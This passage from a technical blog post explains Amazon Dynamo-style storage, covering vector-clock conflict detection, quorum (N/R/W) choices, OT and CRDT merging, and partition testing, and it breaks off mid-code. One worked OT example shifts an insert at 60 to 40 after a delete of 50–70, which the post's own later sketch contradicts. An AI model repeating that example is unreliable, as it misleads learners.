            &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
            &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;merged_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Merged result: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;merged_value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Write the resolved version back with the merged clock as context.
&lt;/span&gt;        &lt;span class="c1"&gt;# This "closes" the conflict — future reads will see a single version.
&lt;/span&gt;        &lt;span class="n"&gt;final_ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;merged_value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;After resolution: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Should be a single version after merge&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;demo&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Expected output:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;=======================================================
SCENARIO 1: Normal write and read (no conflict)
=======================================================
[PUT] key='cart:user-42'  value={'items': ['shoes']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
Read result: {'items': ['shoes']}

[PUT] key='cart:user-42'  value={'items': ['shoes', 'jacket']}  clock=VectorClock({'node-A': 2})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
After update: {'items': ['shoes', 'jacket']}

=======================================================
SCENARIO 2: Simulated conflict — two concurrent writes
=======================================================
[PUT] key='cart:user-99'  value={'items': ['hat']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)

[GET] key='cart:user-99'  status=CONFLICT (2 versions)  (3/3 nodes responded)

Conflict detected! 2 concurrent versions:
  Version 1: {'items': ['hat', 'scarf']}  clock=VectorClock({'node-A': 2})
  Version 2: {'items': ['hat', 'gloves']}  clock=VectorClock({'node-A': 1, 'node-B': 1})

Merged result: {'items': ['gloves', 'hat', 'scarf']}
[PUT] key='cart:user-99'  value={'items': ['gloves', 'hat', 'scarf']}  ...  (3/3 nodes wrote)
[GET] key='cart:user-99'  status=clean  (3/3 nodes responded)

After resolution: {'items': ['gloves', 'hat', 'scarf']}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What to notice:&lt;/strong&gt; In Scenario 2, the coordinator correctly identifies that &lt;code&gt;{'node-A': 2}&lt;/code&gt; and &lt;code&gt;{'node-A': 1, 'node-B': 1}&lt;/code&gt; are neither equal nor in a dominance relationship — neither is an ancestor of the other — so both are surfaced as concurrent. The application then takes responsibility for merging them and writing back a resolved version with the merged clock.&lt;/p&gt;
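&lt;p&gt;The dominance test itself is small. Here is a minimal standalone sketch of the comparison the coordinator performs; this toy &lt;code&gt;VectorClock&lt;/code&gt; is illustrative, not the full class from the demo:&lt;/p&gt;

```python
# Minimal sketch of the dominance test a Dynamo-style coordinator runs.
class VectorClock:
    def __init__(self, counters=None):
        self.counters = dict(counters or {})

    def dominates(self, other):
        # self dominates other if it is at least as new on every node
        # and strictly newer somewhere.
        at_least = all(self.counters.get(node, 0) >= count
                       for node, count in other.counters.items())
        strictly = self.counters != other.counters
        return at_least and strictly

def concurrent(a, b):
    # Neither clock dominates the other: the writes are concurrent.
    return not a.dominates(b) and not b.dominates(a)

v1 = VectorClock({"node-A": 2})               # the "scarf" write
v2 = VectorClock({"node-A": 1, "node-B": 1})  # the "gloves" write
print(concurrent(v1, v2))  # True: both versions are surfaced to the app
```

&lt;p&gt;A dominated version is an ancestor and can be pruned; only mutually non-dominating versions survive to the application.&lt;/p&gt;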

&lt;h2&gt;
  
  
  Key Lessons for System Design
&lt;/h2&gt;

&lt;p&gt;After years of working with Dynamo-inspired systems, these are my key takeaways:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. &lt;strong&gt;Always-On Beats Strongly-Consistent&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;For user-facing applications, availability almost always wins. Users will tolerate seeing slightly stale data. They won't tolerate "Service Unavailable."&lt;/p&gt;

&lt;h3&gt;
  
  
  2. &lt;strong&gt;Application-Level Reconciliation is Powerful&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Don't be afraid to push conflict resolution to the application. The application understands the business logic and can make smarter decisions than the database ever could.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;strong&gt;Tunable Consistency is Essential&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;One size doesn't fit all. Shopping cart additions need high availability (W=1). Financial transactions need stronger guarantees (W=N). The ability to tune this per-operation is incredibly valuable.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. &lt;strong&gt;The 99.9th Percentile Matters More Than Average&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Focus your optimization efforts on tail latencies, not averages. Averages hide the slow requests, and your most active users are exactly the ones most likely to hit the tail during peak times.&lt;/p&gt;
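&lt;p&gt;A quick synthetic illustration of why the mean misleads; the numbers are made up (a mostly-fast workload with a 0.1% slow tail):&lt;/p&gt;

```python
import random

random.seed(7)
# Synthetic latencies: most requests are fast, a few hit slow paths
# (disk stalls, GC pauses, overloaded replicas).
latencies_ms = ([random.gauss(10, 2) for _ in range(9990)]
                + [random.uniform(200, 900) for _ in range(10)])

def percentile(values, p):
    ordered = sorted(values)
    idx = min(len(ordered) - 1, int(p / 100 * len(ordered)))
    return ordered[idx]

mean = sum(latencies_ms) / len(latencies_ms)
print(f"mean  = {mean:.1f} ms")                              # looks healthy
print(f"p99.9 = {percentile(latencies_ms, 99.9):.1f} ms")    # what tail users see
```

&lt;p&gt;The mean stays close to the fast path while the 99.9th percentile is dominated entirely by the slow requests.&lt;/p&gt;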

&lt;h3&gt;
  
  
  5. &lt;strong&gt;Gossip Protocols Scale Beautifully&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Decentralized coordination via gossip eliminates single points of failure and scales to thousands of nodes.&lt;/p&gt;
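&lt;p&gt;The intuition behind "scales beautifully" is that push gossip spreads information exponentially, so the number of rounds grows roughly with the logarithm of cluster size. A toy simulation (the fanout and node counts are arbitrary):&lt;/p&gt;

```python
import math
import random

def gossip_rounds(num_nodes, fanout=3, seed=42):
    """Simulate push gossip: each informed node tells `fanout` random
    peers per round. Returns the rounds until every node knows."""
    rng = random.Random(seed)
    informed = {0}              # node 0 learns of a membership change
    rounds = 0
    while len(informed) < num_nodes:
        rounds += 1
        for _node in list(informed):
            for _ in range(fanout):
                informed.add(rng.randrange(num_nodes))
    return rounds

for n in (10, 100, 1000, 10000):
    print(f"{n:6d} nodes -> {gossip_rounds(n)} rounds "
          f"(log2 of n is {math.log2(n):.1f})")
```

&lt;p&gt;Growing the cluster 1000x adds only a handful of rounds, which is why gossip-based membership stays cheap at scale.&lt;/p&gt;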

&lt;h2&gt;
  
  
  When NOT to Use Dynamo-Style Systems
&lt;/h2&gt;

&lt;p&gt;Be honest about trade-offs. Don't use this approach when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Strong consistency is required&lt;/strong&gt; (financial transactions, inventory management)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complex queries are needed&lt;/strong&gt; (reporting, analytics, joins)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transactions span multiple items&lt;/strong&gt; (Dynamo is single-key operations only)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Your team can't handle eventual consistency&lt;/strong&gt; (if developers don't understand vector clocks and conflict resolution, you'll have problems)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Dynamo represents a fundamental shift in how we think about distributed systems. By embracing eventual consistency and providing tunable trade-offs, it enables building systems that scale to massive sizes while maintaining high availability.&lt;/p&gt;

&lt;p&gt;The paper's lessons have influenced an entire generation of distributed databases. Whether you're using Cassandra, Riak, or DynamoDB, you're benefiting from the insights first published in this paper.&lt;/p&gt;

&lt;p&gt;As engineers, our job is to understand these trade-offs deeply and apply them appropriately. Dynamo gives us a powerful tool, but like any tool, it's only as good as our understanding of when and how to use it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Original Dynamo Paper: &lt;a href="https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf" rel="noopener noreferrer"&gt;SOSP 2007&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Werner Vogels' Blog: &lt;a href="https://www.allthingsdistributed.com/" rel="noopener noreferrer"&gt;All Things Distributed&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Cassandra Documentation: Understanding how these concepts are implemented&lt;/li&gt;
&lt;li&gt;"Designing Data-Intensive Applications" by Martin Kleppmann - Chapter 5 on Replication&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Appendix: Design Problems and Approaches
&lt;/h2&gt;

&lt;p&gt;Three open-ended problems that come up in system design interviews and real engineering work. Think through each before reading the discussion.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 1: Conflict Resolution for a Collaborative Document Editor
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: You're building something like Google Docs backed by a Dynamo-style store. Two users edit the same paragraph simultaneously. How do you handle the conflict?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why shopping cart union doesn't work here&lt;/strong&gt;: The shopping cart strategy (union of all items) is only safe because adding items is commutative — &lt;code&gt;{A} ∪ {B} = {B} ∪ {A}&lt;/code&gt;. Text editing is not commutative. If User A deletes a sentence and User B edits the middle of it, the union of their changes is meaningless or contradictory.&lt;/p&gt;
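&lt;p&gt;You can see the difference in a few lines: set union commutes, but applying the same two text edits in different orders produces different documents. The helper functions here are purely illustrative:&lt;/p&gt;

```python
# Set union is commutative and idempotent, so merge order cannot matter:
a, b = {"hat", "scarf"}, {"hat", "gloves"}
assert a | b == b | a == {"hat", "scarf", "gloves"}

# Text edits are not commutative: the same two edits applied in a
# different order yield different documents.
def delete(text, pos, length):
    return text[:pos] + text[pos + length:]

def insert(text, pos, s):
    return text[:pos] + s + text[pos:]

doc = "the quick brown fox"
order1 = insert(delete(doc, 4, 6), 4, "slow ")   # delete, then insert
order2 = delete(insert(doc, 4, "slow "), 4, 6)   # insert, then delete
print(order1)
print(order2)
print(order1 == order2)   # False: order changed the outcome
```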

&lt;p&gt;&lt;strong&gt;The right approach: Operational Transformation (OT) or CRDTs&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The industry solution is to represent the document not as a blob of text, but as a sequence of operations, and to transform concurrent operations so they can both be applied without conflict:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User A's operation: delete(position=50, length=20)
User B's operation: insert(position=60, text="new sentence")

Without OT: B's insert position (60) is now wrong because A deleted 20 chars.
With OT:    Transform B's operation against A's:
            B's insert position shifts to 40 (60 - 20).
            Both operations now apply cleanly.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
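&lt;p&gt;As a sketch, the insert-vs-delete transform is a small position adjustment. The function below is illustrative only; production OT engines must handle every pairing of operation types, plus tie-breaking rules:&lt;/p&gt;

```python
def transform_insert_against_delete(ins_pos, del_pos, del_len):
    """Shift an insert's position to account for a concurrent delete.
    Covers only this one case; real OT also transforms insert-vs-insert,
    delete-vs-delete, and resolves ties deterministically."""
    if ins_pos <= del_pos:
        return ins_pos               # insert lands before the deletion
    if ins_pos >= del_pos + del_len:
        return ins_pos - del_len     # insert lands after: shift left
    return del_pos                   # insert fell inside the deleted span

# An insert at 80 concurrent with delete(position=50, length=20)
# shifts left by the deleted length:
print(transform_insert_against_delete(80, 50, 20))   # 60
# An insert inside the deleted range clamps to the deletion point:
print(transform_insert_against_delete(60, 50, 20))   # 50
```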



&lt;p&gt;The conflict resolution strategy for the Dynamo layer would be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Store operations (not full document snapshots) as the value for each key.&lt;/li&gt;
&lt;li&gt;On conflict, collect all concurrent operation lists from each version.&lt;/li&gt;
&lt;li&gt;Apply OT to merge them into a single consistent operation log.&lt;/li&gt;
&lt;li&gt;Write the merged log back with the merged vector clock as context.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What to store in Dynamo&lt;/strong&gt;: The operation log per document segment, not the rendered text. This makes merges deterministic and lossless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world reference&lt;/strong&gt;: This is essentially how Google Docs, Notion, and Figma work. Their storage layers use either OT or a variant of CRDTs (Conflict-free Replicated Data Types), which are data structures mathematically guaranteed to merge without conflicts regardless of operation ordering.&lt;/p&gt;
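&lt;p&gt;The smallest CRDT is the grow-only set (G-Set): its merge is plain set union, which is commutative, associative, and idempotent, so replicas converge regardless of merge order. A sketch (supporting removals requires a richer type such as an OR-Set):&lt;/p&gt;

```python
class GSet:
    """Grow-only set: the simplest state-based CRDT. Replicas merge by
    union, so any order and any number of merges converge to the same
    state. Removal is deliberately unsupported; that needs an OR-Set."""
    def __init__(self, items=()):
        self.items = set(items)

    def add(self, item):
        self.items.add(item)

    def merge(self, other):
        return GSet(self.items | other.items)

# Two replicas diverge, then exchange state in either order:
laptop, phone = GSet({"hat"}), GSet({"hat"})
laptop.add("scarf")
phone.add("gloves")
print(laptop.merge(phone).items == phone.merge(laptop).items)   # True
```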

&lt;h3&gt;
  
  
  Problem 2: Choosing N, R, W for Different Use Cases
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: What configuration would you pick for (a) a session store, (b) a product catalog, (c) user profiles?&lt;/p&gt;

&lt;p&gt;The right way to think about this: identify the failure mode that costs more — a missed write (data loss) or a rejected write (unavailability). Then pick quorum values accordingly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Session store — prioritize availability&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sessions are temporary and user-specific. If a user's session is briefly stale or lost, they get logged out and log back in. That's annoying but not catastrophic. You never want to reject a session write.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=1, W=1

Rationale:
- W=1: Accept session writes even during heavy failures.
        A user can't log in if their session write is rejected.
- R=1: Read from any single node. Stale session data is harmless.
- N=3: Still replicate to 3 nodes for basic durability.

Trade-off accepted: Stale session reads are possible but inconsequential.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Product catalog — prioritize read performance and consistency&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Product data is written rarely (by ops teams) but read millions of times per day. Stale prices or descriptions are problematic. You want fast, consistent reads.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=2, W=3

Rationale:
- W=3: All replicas must confirm a catalog update before it's live.
        A price change half-published is worse than a brief write delay,
        and catalog writes are rare, so write latency doesn't matter.
- R=2: Read quorum overlaps with W=3 (R + W = 5, which exceeds N), so
        reads see fresh data while touching only 2 of 3 replicas.
- N=3: Standard replication for durability.

Trade-off accepted: Writes are slow and fail if any node is down.
                    Acceptable because catalog updates are infrequent.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;User profiles — balanced&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Profile data (name, email, preferences) is moderately important. A stale profile is annoying but not dangerous. A rejected update (e.g., user can't update their email) is a real problem.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=2, W=2

Rationale:
- The classic balanced configuration.
- R + W = 4 &amp;gt; N = 3, so quorums overlap: reads will see the latest write.
- Tolerates 1 node failure for both reads and writes.
- Appropriate for data that matters but doesn't require strict consistency.

Trade-off accepted: A second simultaneous node failure will cause errors.
                    Acceptable for non-critical user data.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Decision framework summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;R&lt;/th&gt;
&lt;th&gt;W&lt;/th&gt;
&lt;th&gt;When to use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Max availability&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Sessions, ephemeral state, click tracking&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Balanced&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;User profiles, preferences, soft state&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consistent reads&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Catalogs, config, rarely-written reference data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Highest consistency&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Anywhere you need R+W &amp;gt; N with zero tolerance for stale reads (still not linearizable)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
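&lt;p&gt;The table's rule of thumb fits in a small helper; the function name is invented for illustration:&lt;/p&gt;

```python
def quorum_properties(n, r, w):
    """Summarize what an (N, R, W) choice buys you."""
    return {
        "overlapping_quorums": r + w > n,   # reads see the latest write
        "read_fault_tolerance": n - r,      # node failures reads survive
        "write_fault_tolerance": n - w,     # node failures writes survive
    }

for name, cfg in [("sessions", (3, 1, 1)),
                  ("profiles", (3, 2, 2)),
                  ("catalog",  (3, 2, 3))]:
    print(name, quorum_properties(*cfg))
```

&lt;p&gt;Note how the session config trades quorum overlap for maximum fault tolerance, while the catalog config does the reverse: W=3 leaves zero write fault tolerance.&lt;/p&gt;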

&lt;h3&gt;
  
  
  Problem 3: Testing a Dynamo-Style System Under Partition Scenarios
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: How do you verify that your system actually behaves correctly when nodes fail and partitions occur?&lt;/p&gt;

&lt;p&gt;This is one of the hardest problems in distributed systems testing because the bugs only appear in specific interleavings of concurrent events that are difficult to reproduce deterministically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: Unit tests for the logic in isolation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Before testing distributed behavior, verify the building blocks independently. Vector clock comparison logic, conflict detection, and reconciliation functions can all be tested with pure unit tests — no networking needed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_concurrent_clocks_detected_as_conflict&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;clock_a&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="n"&gt;clock_b&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;clock_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;clock_b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;clock_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;clock_a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# Both survive reconciliation → conflict correctly detected
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_ancestor_clock_is_discarded&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;old_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;old_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# old_clock should be pruned during reconciliation
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Layer 2: Deterministic fault injection&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Rather than hoping failures happen in the right order during load testing, inject them deliberately and repeatably. In the demo implementation above, &lt;code&gt;node.down = True&lt;/code&gt; is a simple version of this. In production systems, libraries like &lt;a href="https://jepsen.io/" rel="noopener noreferrer"&gt;Jepsen&lt;/a&gt; or &lt;a href="https://netflix.github.io/chaosmonkey/" rel="noopener noreferrer"&gt;Chaos Monkey&lt;/a&gt; do this at the infrastructure level.&lt;/p&gt;

&lt;p&gt;Key scenarios to test:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario A: Write succeeds with W=2, third replica is down.
  → Verify: the data is readable after the down node recovers.
  → Verify: no data loss occurred.

Scenario B: Two nodes accept concurrent writes to the same key.
  → Verify: the next read surfaces exactly 2 conflicting versions.
  → Verify: after the application writes a merged version, the next read is clean.

Scenario C: Node goes down mid-write (wrote to W-1 nodes).
  → Verify: the write is correctly rejected (RuntimeError).
  → Verify: no partial writes are visible to readers.

Scenario D: All N nodes recover after a full partition.
  → Verify: no data was lost across the cluster.
  → Verify: vector clocks are still meaningful (no spurious conflicts).
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
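&lt;p&gt;Scenario C, for example, can be exercised against a toy in-memory cluster. &lt;code&gt;Replica&lt;/code&gt; and &lt;code&gt;put&lt;/code&gt; below are invented for illustration and are not the demo's classes:&lt;/p&gt;

```python
class Replica:
    def __init__(self):
        self.store = {}
        self.down = False          # the fault-injection knob

def put(replicas, key, value, w):
    """Toy coordinator: write to every live replica, fail unless at
    least `w` acknowledged. No hinted handoff in this sketch."""
    acks = 0
    for r in replicas:
        if not r.down:
            r.store[key] = value
            acks += 1
    if acks < w:
        raise RuntimeError(f"only {acks} of required {w} replicas acked")
    return acks

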